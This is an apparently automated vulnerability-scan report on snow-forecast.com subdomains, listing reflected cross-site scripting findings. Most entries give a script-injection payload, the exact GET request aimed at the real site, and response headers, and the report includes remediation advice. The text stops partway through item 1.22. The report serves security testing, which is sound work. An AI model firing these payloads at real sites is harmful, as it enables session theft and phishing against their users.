Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://cz.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a7a"><script>alert(1)</script>a7bfa3d9337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64a7a"><script>alert(1)</script>a7bfa3d9337=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c49462ceded29336506baa333cc5daca" X-Runtime: 49 Content-Length: 24431 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21208"><script>alert(1)</script>039b6a685b6 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'21208"><script>alert(1)</script>039b6a685b6 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1644f7643d4e14fcbbdc301f0742c4f5" X-Runtime: 69 Content-Length: 18310 Set-Cookie: sfcsid=9194634b97339418d9f2c5b83fcf4d84; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8484b"><script>alert(1)</script>96d3ccf0e21 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E8484b"><script>alert(1)</script>96d3ccf0e21 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "e84b0854eb12d518104cb443a8e64d4f" X-Runtime: 365 Content-Length: 19382 Set-Cookie: sfcsid=2b641f1cfc92107e3aab0c3cb6d51280; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.4. http://cz.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b95c"><script>alert(1)</script>5fb4bdd990b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?6b95c"><script>alert(1)</script>5fb4bdd990b=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4d079e54704b31cf07ef64d024cb39d7" X-Runtime: 56 Content-Length: 18297 Set-Cookie: sfcsid=783ef82bc593dae2b76d2ce4f01a8524; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.5. http://cz.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda15"><script>alert(1)</script>33e1cbb6f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?bda15"><script>alert(1)</script>33e1cbb6f93=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "49314cee0ac5223ee825ff8e86497923" X-Runtime: 62 Content-Length: 27871 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.6. http://cz.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8f5"><script>alert(1)</script>3dd76f3b11b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?be8f5"><script>alert(1)</script>3dd76f3b11b=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c182974d841c4c56d147c62d97b7e1f3" X-Runtime: 794 Content-Length: 42584 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:11:58 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.7. http://de.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbac"><script>alert(1)</script>95e84bca782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?fbbac"><script>alert(1)</script>95e84bca782=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f432ab52bfe493d159f2628628f45908" X-Runtime: 161 Content-Length: 24250 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe82"><script>alert(1)</script>a7a85dea370 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'bfe82"><script>alert(1)</script>a7a85dea370 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "db1ae35e6265667fd2eb94a26d4c6dac" X-Runtime: 57 Content-Length: 18134 Set-Cookie: sfcsid=5b753bfae8b07ad1ccf13ed46d2338b3; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b2b"><script>alert(1)</script>1e751c12c95 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E53b2b"><script>alert(1)</script>1e751c12c95 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "fc873d4e8b7694a22a12a79a5aaa5b1e" X-Runtime: 58 Content-Length: 19193 Set-Cookie: sfcsid=9276811bc649b9ba2d38c17e505cfdbc; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.10. http://de.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c9d"><script>alert(1)</script>2c618ed1318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?b5c9d"><script>alert(1)</script>2c618ed1318=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "727cde662c4f523eaaa6a44a1fda4981" X-Runtime: 77 Content-Length: 18120 Set-Cookie: sfcsid=b6bcd058030d4436da0d1e82fb55c657; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.11. http://de.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a224c"><script>alert(1)</script>6575e373dcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?a224c"><script>alert(1)</script>6575e373dcc=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "cd6798c9e587626ff41ab5b32451775d" X-Runtime: 460 Content-Length: 27682 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.12. http://de.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e817b"><script>alert(1)</script>34efc92cee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?e817b"><script>alert(1)</script>34efc92cee8=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "7f54090762abf3112c11e2452075d762" X-Runtime: 141 Content-Length: 42304 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:02 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Courchevel Wetter ...[SNIP]... <a href="http://hu.snow-forecast.com/resorts/Courchevel?e817b"><script>alert(1)</script>34efc92cee8=1"> ...[SNIP]...
1.13. http://es.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975dd"><script>alert(1)</script>973d6f889b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?975dd"><script>alert(1)</script>973d6f889b=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "9b29893ee54817faf668ff72d0baa08f" X-Runtime: 101 Content-Length: 24327 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 773ec"><script>alert(1)</script>4abeccce8b7 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'773ec"><script>alert(1)</script>4abeccce8b7 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d2a6954b7a10249e66a0f0fa066cfb53" X-Runtime: 57 Content-Length: 18247 Set-Cookie: sfcsid=9c88d77d2cd1a29c3e28aafa49f30ee0; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41142"><script>alert(1)</script>e6400709715 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E41142"><script>alert(1)</script>e6400709715 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4cac985e36425073200ee4588f4c7187" X-Runtime: 92 Content-Length: 19295 Set-Cookie: sfcsid=d6e0823ae17b18f3b7450187a984bd59; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.16. http://es.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eced"><script>alert(1)</script>64fe131412b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?4eced"><script>alert(1)</script>64fe131412b=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "e1240e1ffb58eb7710b57da98aa91a95" X-Runtime: 67 Content-Length: 18222 Set-Cookie: sfcsid=b3fd6708954d5e7207d90d6addcbf1e8; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.17. http://es.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192d8"><script>alert(1)</script>84ea65d4895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?192d8"><script>alert(1)</script>84ea65d4895=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "53f297749ceed95abf16ecfdfc0bfc6a" X-Runtime: 547 Content-Length: 27890 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.18. http://es.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adb5"><script>alert(1)</script>46c246d5ba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?6adb5"><script>alert(1)</script>46c246d5ba3=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1e1b929cd053412211ee68d7cc7ea25c" X-Runtime: 142 Content-Length: 42639 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:20 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.19. http://fr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f768"><script>alert(1)</script>81b91734d9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?2f768"><script>alert(1)</script>81b91734d9d=1 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "dc78481bda8beb47ff1f02061ae68dd8" X-Runtime: 67 Content-Length: 24444 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c215"><script>alert(1)</script>cf206e690ff was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'8c215"><script>alert(1)</script>cf206e690ff HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c86ecaecd4fc4779c65ff7a2c914a297" X-Runtime: 59 Content-Length: 18244 Set-Cookie: sfcsid=02657e17ffdc5eb930cd62c9d1aacf4c; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396a0"><script>alert(1)</script>fc182e50300 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E396a0"><script>alert(1)</script>fc182e50300 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "51be0bfa877162fc20469dae7061b47e" X-Runtime: 64 Content-Length: 19348 Set-Cookie: sfcsid=b0eaac30c36577861504f451b838b266; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.22. http://fr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fr.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd33"><script>alert(1)</script>d7988552faf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
